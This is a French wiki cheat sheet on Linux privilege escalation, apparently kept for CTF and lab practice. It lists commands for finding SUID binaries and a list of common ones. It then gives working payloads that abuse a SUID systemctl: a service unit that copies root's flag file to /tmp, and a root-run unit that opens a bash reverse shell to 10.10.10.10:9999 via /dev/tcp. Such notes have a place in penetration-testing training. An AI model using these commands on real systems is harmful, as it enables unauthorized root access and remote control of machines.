====== Privesc GNU/Linux ======

===== SUID =====

''%%find / -user root -perm -4000 -print 2>/dev/null%%''\\
ou\\
''%%find / -perm -u=s -type f 2>/dev/null%%''
===== Liste des SUID courants =====

<code>
/bin/fusermount
/bin/mount
/bin/ntfs-3g
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/sbin/mount.cifs
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/squid/pinger
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
</code>

===== SUID systemctl =====

[[https://gtfobins.github.io/gtfobins/systemctl/]]\\
[[https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49]]\\
[[https://www.jil-wright.com/blog/tryhackmevulnversity]]


<code>
cd /bin
sh

sh -p

echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output.txt"
[Install]
WantedBy=multi-user.target' > $TF

./systemctl link $TF

./systemctl enable --now $TF

cat /tmp/output.txt
</code>

<code>
[Unit]
Description=roooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/9999 0>&1'

[Install]
WantedBy=multi.user.target
</code>